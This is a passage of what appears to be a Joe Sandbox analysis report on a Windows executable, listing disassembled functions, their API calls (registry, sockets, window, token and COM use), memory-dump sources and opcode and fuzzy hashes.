GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B0DA74
LoadStringW.USER32(00000000), ref: 00B0DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0DA91
LoadStringW.USER32(00000000), ref: 00B0DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B0DAB9

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: ecfeb51361ddf560d236dd99db0a42c5c2c0c3f1f55ad78048124850a3ef6c88
Instruction ID: dd15663cbec18de05e87314898cfb7a2af0159120ca8b8f1f3faf029ffe4c9c3
Opcode Fuzzy Hash: ecfeb51361ddf560d236dd99db0a42c5c2c0c3f1f55ad78048124850a3ef6c88
Instruction Fuzzy Hash: BA014FF25002087BE7509BE09D89EEA3AACE708701F500495B706F3081EA749E844B74

Function 00B1096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(015BE8E0,015BE8E0), ref: 00B1097B
EnterCriticalSection.KERNEL32(015BE8C0,00000000), ref: 00B1098D
TerminateThread.KERNEL32(015BE8D8,000001F6), ref: 00B1099B
WaitForSingleObject.KERNEL32(015BE8D8,000003E8), ref: 00B109A9
CloseHandle.KERNEL32(015BE8D8), ref: 00B109B8
InterlockedExchange.KERNEL32(015BE8E0,000001F6), ref: 00B109C8
LeaveCriticalSection.KERNEL32(015BE8C0), ref: 00B109CF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7a2622f824f68ba85b250c1ceec59c0d8c102958dd885c67a74d5c516ea66651
Instruction ID: 18e4c394be1e0fc8fde32a8d461b1e2de032b5fccb07ea40e9f8c248817629e8
Opcode Fuzzy Hash: 7a2622f824f68ba85b250c1ceec59c0d8c102958dd885c67a74d5c516ea66651
Instruction Fuzzy Hash: 4FF0CD31442912BBD7515B94EE89ADA7A65FF05742FA01015F101A18A1CBB594B5CF90

Function 00B21C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B21DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B21DE1
WSAGetLastError.WSOCK32 ref: 00B21DF2
htons.WSOCK32(?,?,?,?,?), ref: 00B21EDB
inet_ntoa.WSOCK32(?), ref: 00B21E8C

Part of subcall function 00B039E8: _strlen.LIBCMT ref: 00B039F2

Part of subcall function 00B23224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00B1EC0C), ref: 00B23240

_strlen.LIBCMT ref: 00B21F35

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 6ee2592647ed953498e22d23016b54a7d0f9943973a8e67e836d33e49f38e4b4
Instruction ID: aec260a1e091ea434cc1c09a12517254d34599033ee16c512cecb56f695936ed
Opcode Fuzzy Hash: 6ee2592647ed953498e22d23016b54a7d0f9943973a8e67e836d33e49f38e4b4
Instruction Fuzzy Hash: 1CB1F230604310AFC324DF28D995E6A7BE5EF95318F58899CF45A5B2E2CB31ED42CB91

Function 00AA5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00AA5D30
GetWindowRect.USER32(?,?), ref: 00AA5D71
ScreenToClient.USER32(?,?), ref: 00AA5D99
GetClientRect.USER32(?,?), ref: 00AA5ED7
GetWindowRect.USER32(?,?), ref: 00AA5EF8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 4dd254c02e144ff957659de75f1157c32164c2495d5edd6e120af96818318f4f
Instruction ID: 94c0df351809f63ef0ee5ec86818efcfb0f2e9963ab6eee85aec14946876219c
Opcode Fuzzy Hash: 4dd254c02e144ff957659de75f1157c32164c2495d5edd6e120af96818318f4f
Instruction Fuzzy Hash: E7B16A35A00A8ADBDB24CFB9C4407EEB7F5FF58310F14841AE8A9D7290DB34AA51DB54

Function 00AD01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00AD00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD00D6
__allrem.LIBCMT ref: 00AD00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD010B
__allrem.LIBCMT ref: 00AD0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD0140

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: bd662939c6e7712e4ea2a37fbdbf08403bbf1fa4b6f877b96852bb4175e907a1
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: C681C172A00706AFE720AB69CD41F6A73A9EF41764F25462FF552DB781E770DA008B90

Function 00AD61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00AC82D9,00AC82D9,?,?,?,00AD644F,00000001,00000001,8BE85006), ref: 00AD6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00AD644F,00000001,00000001,8BE85006,?,?,?), ref: 00AD62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AD63D8
__freea.LIBCMT ref: 00AD63E5

Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852

__freea.LIBCMT ref: 00AD63EE
__freea.LIBCMT ref: 00AD6413

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 68e8ff7ed1e5f672e234618efea416fcb60871404a6aeedb3570dbe18cf80d3b
Instruction ID: b8ee12a38b308cf0ef38d70328c6ba615f2af519c33b3e9a9e74d24f71b43b4c
Opcode Fuzzy Hash: 68e8ff7ed1e5f672e234618efea416fcb60871404a6aeedb3570dbe18cf80d3b
Instruction Fuzzy Hash: 6C51E172A00216ABDF258F64DD81EAF7BA9EF44750F15462AFC06DB241DB34DC44D660

Function 00B2BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2BD25
RegCloseKey.ADVAPI32(00000000), ref: 00B2BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B2BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B2BDF3
RegCloseKey.ADVAPI32(?), ref: 00B2BDFF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: d7ba583f2be69673ae634cdedf545cf4d7a567c7df3e14574ee5c44822aae1f6
Instruction ID: 389cbb8c2f38ea90b726363996101915b6841db320dd75e2d1eeb17259a56302
Opcode Fuzzy Hash: d7ba583f2be69673ae634cdedf545cf4d7a567c7df3e14574ee5c44822aae1f6
Instruction Fuzzy Hash: AB81AC30208241AFC714DF24D881E6ABBE5FF85348F1489ACF5598B2A2DF31ED45CB92

Function 00AFF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00AFF7B9
SysAllocString.OLEAUT32(00000001), ref: 00AFF860
VariantCopy.OLEAUT32(00AFFA64,00000000), ref: 00AFF889
VariantClear.OLEAUT32(00AFFA64), ref: 00AFF8AD
VariantCopy.OLEAUT32(00AFFA64,00000000), ref: 00AFF8B1
VariantClear.OLEAUT32(?), ref: 00AFF8BB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 86d03e215c108407060a22b5d09c19e8a8ffae990a10fd0ea3366d2770915820
Instruction ID: ae4e7ae3c25b36fe126912d774ab89a0f604e288b82b96ee7876d628423349d1
Opcode Fuzzy Hash: 86d03e215c108407060a22b5d09c19e8a8ffae990a10fd0ea3366d2770915820
Instruction Fuzzy Hash: DF51B635500318BECF24ABE5D8D5B79B3A8EF45710B249467FA05DF292DBB08C40D7A6

Function 00B1910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625

Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 00B194E5
_wcslen.LIBCMT ref: 00B19506
_wcslen.LIBCMT ref: 00B1952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00B19585

Strings

X, xrefs: 00B19412

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 031f41632ecf3a3439168895d7062098f13c02bc343fc47961771b8c384c5f61
Instruction ID: 87c8c2b9237b725ba333b9a32a0edeb118306485bf0acadda23752a494499c69
Opcode Fuzzy Hash: 031f41632ecf3a3439168895d7062098f13c02bc343fc47961771b8c384c5f61
Instruction Fuzzy Hash: A9E1C0319083418FD724DF24C991AAEB7E5FF85310F1489ADF8999B2A2DB30DD45CB92

Function 00AB920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2

BeginPaint.USER32(?,?,?), ref: 00AB9241
GetWindowRect.USER32(?,?), ref: 00AB92A5
ScreenToClient.USER32(?,?), ref: 00AB92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AB92D3
EndPaint.USER32(?,?,?,?,?), ref: 00AB9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00AF71EA

Part of subcall function 00AB9339: BeginPath.GDI32(00000000), ref: 00AB9357

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: baab8c285dc236cc055611b23d5437a6747983517a7f8b012a08dc8aae41cdd1
Instruction ID: e376b96954ac5b109e73b17dd61faa47ce4c2b230ae0fea04d8d55d38d919700
Opcode Fuzzy Hash: baab8c285dc236cc055611b23d5437a6747983517a7f8b012a08dc8aae41cdd1
Instruction Fuzzy Hash: 90418D71104200AFD711DF68C885FBB7BB8EB55320F140669FAA9972B2CB319846DB61

Function 00B107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B1080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B10847
EnterCriticalSection.KERNEL32(?), ref: 00B10863
LeaveCriticalSection.KERNEL32(?), ref: 00B108DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B108F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B10921

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: d7abfcc4cdc31f3617aebd98eddafa3bcc0b9940fb4f798a6bb6540aba92af4c
Instruction ID: 7322cb343e6c08fe5c5e689a0abeb13b11f52bf1a842abcd0bc1b1ee5f435a87
Opcode Fuzzy Hash: d7abfcc4cdc31f3617aebd98eddafa3bcc0b9940fb4f798a6bb6540aba92af4c
Instruction Fuzzy Hash: 49418D71900205EFDF14AFA4DD85AAA77B9FF04310F1440A9ED04AB297DB74DEA0DBA0

Function 00B381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00AFF3AB,00000000,?,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00B3824C
EnableWindow.USER32(00000000,00000000), ref: 00B38272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B382D1
ShowWindow.USER32(00000000,00000004), ref: 00B382E5
EnableWindow.USER32(00000000,00000001), ref: 00B3830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B3832F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 8491bd1fc6e1a381d339ca4d098ec915e422c3dc103b4e49e271f72ab7cd6f10
Instruction ID: 2c5ec1deb5e11c205b087170914ecedad12fc3b272e1bc6c310f3e5710e467dd
Opcode Fuzzy Hash: 8491bd1fc6e1a381d339ca4d098ec915e422c3dc103b4e49e271f72ab7cd6f10
Instruction Fuzzy Hash: 8F418334601744AFDB12CF19DC99BA57BE0FB4A714F2841E9FA085B262CB31A842CF52

Function 00B04C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00B04C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B04CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B04CEA
_wcslen.LIBCMT ref: 00B04D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B04D10
_wcsstr.LIBVCRUNTIME ref: 00B04D1A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ab6716160bc0aee0c95eacb46f1c1b6eb9c3e8ae44fa584ada5bcb2fdf147991
Instruction ID: d1bdce861d0fb25626cbed6feeed020533ef68e9a78ff6c06e3a906a5348f271
Opcode Fuzzy Hash: ab6716160bc0aee0c95eacb46f1c1b6eb9c3e8ae44fa584ada5bcb2fdf147991
Instruction Fuzzy Hash: 6D21F2B2204200BBEB255B69AD4AE7F7FDCDF45750F1081B9F905DB192EB61DC0097A0

Function 00B1581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2

_wcslen.LIBCMT ref: 00B1587B
CoInitialize.OLE32(00000000), ref: 00B15995
CoCreateInstance.OLE32(00B3FCF8,00000000,00000001,00B3FB68,?), ref: 00B159AE
CoUninitialize.OLE32 ref: 00B159CC

Strings

.lnk, xrefs: 00B15876, 00B158C1, 00B15985

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 4feb3de6a24c61ae859986c89c87e06af2e4ceb0e629c1f49ace77e44963e82b
Instruction ID: 844e7375c0cd7473bb951f20f99b6e122d023611b205b7c6b7424fa0a33bec40
Opcode Fuzzy Hash: 4feb3de6a24c61ae859986c89c87e06af2e4ceb0e629c1f49ace77e44963e82b
Instruction Fuzzy Hash: C8D15471608601DFC724DF24C580A6EBBE5EF89710F54889DF88A9B261DB31ED85CB92

Function 00B0175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B00FCA
Part of subcall function 00B00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B00FD6
Part of subcall function 00B00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B00FE5
Part of subcall function 00B00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B00FEC
Part of subcall function 00B00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B01002

GetLengthSid.ADVAPI32(?,00000000,00B01335), ref: 00B017AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B017BA
HeapAlloc.KERNEL32(00000000), ref: 00B017C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 00B017DA
GetProcessHeap.KERNEL32(00000000,00000000,00B01335), ref: 00B017EE
HeapFree.KERNEL32(00000000), ref: 00B017F5

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 17c42430e93e94a151fbde532b3d5411b00fabdfe65f87dcb4e025ccceb3a87f
Instruction ID: e39c49ac4f8ceac8e79d166f3e2e01bc3cbb35e8c9c9e6ffe046bc9a06ab3c63
Opcode Fuzzy Hash: 17c42430e93e94a151fbde532b3d5411b00fabdfe65f87dcb4e025ccceb3a87f
Instruction Fuzzy Hash: C711BEB6500605FFDB18DFA8CC49BAE7FE9EB45355F204898F482A7290CB35AD40DB60

Function 00B014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B014FF
OpenProcessToken.ADVAPI32(00000000), ref: 00B01506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B01515
CloseHandle.KERNEL32(00000004), ref: 00B01520
